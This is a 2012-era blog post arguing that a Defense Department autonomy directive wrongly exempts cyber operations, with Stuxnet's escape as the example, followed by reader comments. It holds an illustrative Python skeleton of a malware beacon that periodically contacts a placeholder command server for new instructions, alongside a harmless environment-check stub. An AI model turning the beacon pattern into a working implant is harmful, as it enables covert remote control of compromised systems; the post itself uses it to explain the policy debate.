Are Escaped Zoo Animals Autonomous?

Back when David Sanger revealed new details of how Stuxnet broke free of Natanz, he used the metaphor of an escaped zoo animal actively unlocking its cage.

In the summer of 2010, shortly after a new variant of the worm had been sent into Natanz, it became clear that the worm, which was never supposed to leave the Natanz machines, had broken free, like a zoo animal that found the keys to the cage. It fell to Mr. Panetta and two other crucial players in Olympic Games — General Cartwright, the vice chairman of the Joint Chiefs of Staff, and Michael J. Morell, the deputy director of the C.I.A. — to break the news to Mr. Obama and Mr. Biden.

An error in the code, they said, had led it to spread to an engineer’s computer when it was hooked up to the centrifuges. When the engineer left Natanz and connected the computer to the Internet, the American- and Israeli-made bug failed to recognize that its environment had changed. It began replicating itself all around the world. [my emphasis]

This zoo animal found the keys to its cage, broke free, spread to an engineer’s computer, failed to recognize its new environment, and then began replicating itself all around the world.

That is, Sanger used the language of a cognizant being, acting as an agent to spread itself. That’s not inapt. After all, viruses do spread themselves (though they don’t actually go seek out keys to do so).
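
To make concrete what “failed to recognize that its environment had changed” would mean in practice, here is a toy Python sketch of the kind of environment gate a narrowly targeted worm is supposed to apply before it does anything. Every detail in it (the hostname prefix, the software check) is invented for illustration; Stuxnet’s source code has never been published. The “error in the code” Sanger describes amounts to a gate like this no longer holding once an infected laptop left the plant.

    import socket

    # Invented placeholders, purely for illustration; nothing here comes from Stuxnet.
    EXPECTED_HOSTNAME_PREFIX = "natanz-eng"
    EXPECTED_CONTROL_SOFTWARE = "Step7"   # Siemens PLC programming suite

    def control_software_present(name: str) -> bool:
        """Stub: a real check would inspect installed software; assume absent here."""
        return False

    def in_target_environment() -> bool:
        """True only when the host matches the (hypothetical) target fingerprint."""
        hostname_ok = socket.gethostname().startswith(EXPECTED_HOSTNAME_PREFIX)
        software_ok = control_software_present(EXPECTED_CONTROL_SOFTWARE)
        return hostname_ok and software_ok

    def act() -> None:
        # Intended design: off target, do nothing at all -- no payload, no self-copying.
        # The failure described above is equivalent to this guard silently passing.
        if not in_target_environment():
            return
        # ... payload would run here ...

    if __name__ == "__main__":
        print("on target" if in_target_environment() else "dormant: wrong environment")

The propagation and payload logic are supposed to sit entirely behind that guard, so one bug in the guard is enough to turn a narrowly targeted tool into something that “began replicating itself all around the world.”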

Which is why this detail, noted in Obama’s other pre-Thanksgiving document dump, is so stunning. (h/t Trevor Timm)

The Defense Department does not require developers of computer systems that launch cyber operations to implement the same safeguards required of traditional arms makers to prevent collateral damage.

[snip]

The directive, released Nov. 21, mandated that automated and semi-autonomous weaponry — such as guided munitions that independently select targets — must have human machine interfaces and “be designed to allow commanders and operators to exercise appropriate levels of human judgment over the use of force.” The mandate called for “rigorous hardware and software verification and validation” to ensure that engagements could be terminated if not completed in a designated time frame. The goal is to minimize “unintended engagements,” the document states.

The Pentagon is permitting less human control over systems that deploy malware, exploits and mitigation tools, highlighting Defense’s focus on agile responses to computer threats. The document, signed by Deputy Secretary of Defense Ashton Carter, explicitly states that the directive “does not apply to autonomous or semi-autonomous cyberspace systems for cyberspace operations.”

We have already lost control of one of our semi-autonomous cyberspace operations. The potential danger from its “escape” could be tremendous.

And yet DOD specifically exempts similar operations in the future? So we can commit the same error again?

15 replies
  1. tib says:

    It has more to do with feasibility. Computer viruses are necessarily autonomous. In the Natanz case, once the virus had arrived at the machine it was designed to corrupt, there was no way for it to communicate with a human back in the US; those machines are not connected to the Internet.

  2. Snoopdido says:

    This is off topic, but worth a note. It seems that the US State Department has released under FOIA some documents regarding the Aulaqi killings (father and son) to Judicial Watch.

    The Judicial Watch press release is here: http://www.judicialwatch.org/press-room/press-releases/judicial-watch-obtains-records-detailing-assassination-of-u-s-born-terrorist-anwar-al-aulaqi-by-a-u-s-drone/

    If anyone is interested, the set of released documents here are quite interesting: http://www.scribd.com/doc/114624884/Abdulrahman-al-Aulaqi-docs-combined#page=56

    Look at the official US Department of State “Cause of Death” on the “Report of Death of an American Citizen Abroad” for Anwar al-Aulaqi’s son Abdulrahman Anwar Al-Aulaqi on page 60 of the documents.

    It states that the formal US understanding regarding the cause of death of Abdulrahman Anwar Al-Aulaqi is “unknown”.

    A strike by a US Hellfire missile produces an “unknown” cause of death?

  3. rg says:

    Perhaps the analogy of the zoo animal “finding” the keys implies that they were found where the zoo-keeper negligently left them. Poor oversight and management; power in the hands of incompetents.

  4. What Constitution says:

    @rg: Yep. And the Indians were to blame for passing around those smallpox-infested blankets, too. That’s what comes to mind, sorry for the incredibly high Politically Incorrect quotient, since we know, just know, that our e-warfare guys would never ever set such things in motion.

  5. What Constitution? says:

    @scribe: Cold War hysteria, that. Nothing for us to worry about now, unless these tactics and ramifications were to fall into the hands of the Republicans….

  6. jerryy says:

    @bmaz: To go a bit further (without mixing in the virus implications), what happens when the AI gets advanced enough that “it” decides that “it” does not want to commit suicide by slamming into targets?

    (The effects caused by these viruses interacting with the advances in tech pose some intriguing ethical quandaries — mutations of viruses, caused directly and indirectly by AI, are scenarios no one has really pushed into yet.)

  7. What Constitution? says:

    @jerryy: I thought that Rubicon was crossed during the making of the Lord of the Rings CGI battle sequences? They tried to program a set of characters who could reactively choose to respond to “dangers” in the hope that this would help to randomize the massive battle activities so it wouldn’t look so choreographed and uniform — and the first time they fired up the sequence, these “special” characters all assessed the situation and, well, they ran away from the perceived dangers…. Is this just an urban legend?

  8. jerryy says:

    @P J Evans: Yeah, some, but I don’t think even HAL or Skynet went so far as to write a virus to use against the competition. In one of Crichton’s yarns, he had the Soviet computer conspire with the US computer to stop war, but he (Crichton) cheated a lot in his writing.

  9. Rayne says:

    I’ve been out of pocket and offline so I missed this, coming late to the party.

    The “escaped zoo animals” analogy is bullshit. At best it’s a form of cover to protect the method of dispersion.

    It didn’t break out, it broke in–the attack’s design inherently relied on this.

    I question Sanger’s role as a journalist here.

    EDIT — 12:15PM 01-DEC-2012 —

    The same article by Sanger points to features that clearly indicate an ongoing communication process with the cyberweapon at Natanz. First, the reference to a “beacon” that implanted itself and then phoned home; second, the varying nature of the attacks. The code could have generated random numbers in the PLCs, but the code’s “beacon” feature also could have asked for resets of the process, in order to change the attacks and/or to hide the code.

    The developers understood this. The authorizers are either clueless or they are hiding behind teh stupid–again, this may be part of the cover.

    I see nothing to indicate the DoD will refrain from using similar tactics as part of any defense methodology, cyberweapon or otherwise. If anything, I sense DoD concern that the same insertion approach could eff up their own weapons. Exhibit A, the early drones with software that could be remotely hacked.
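
Rayne’s point about a “beacon” that implanted itself and then phoned home can be illustrated with a toy check-in loop, sketched below in Python with an invented endpoint; nothing here comes from the actual tool. The shape of the design is the point: the implant periodically tries to reach an outside server for new instructions, and when no channel is reachable (as on an air-gapped control network) it falls back to whatever behavior was packed in beforehand, which is exactly what “semi-autonomous” means in practice.

    import time
    import urllib.request

    C2_URL = "https://c2.example.invalid/checkin"   # invented placeholder endpoint

    def fetch_instructions(timeout: float = 5.0):
        """Try to phone home; return new instructions, or None if unreachable."""
        try:
            with urllib.request.urlopen(C2_URL, timeout=timeout) as resp:
                return resp.read()
        except OSError:
            return None   # offline or air-gapped: no human in the loop

    def apply_instructions(instructions: bytes) -> None:
        pass   # placeholder: operators can retask the implant

    def apply_preprogrammed_rules() -> None:
        pass   # placeholder: packed-in behavior only

    def run() -> None:
        while True:
            instructions = fetch_instructions()
            if instructions is not None:
                apply_instructions(instructions)   # semi-autonomous path
            else:
                apply_preprogrammed_rules()        # fully autonomous path
            time.sleep(3600)                       # check in roughly hourly

Everything in the fallback branch runs with no human judgment at all, which is the scenario the post is worried about.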

Comments are closed.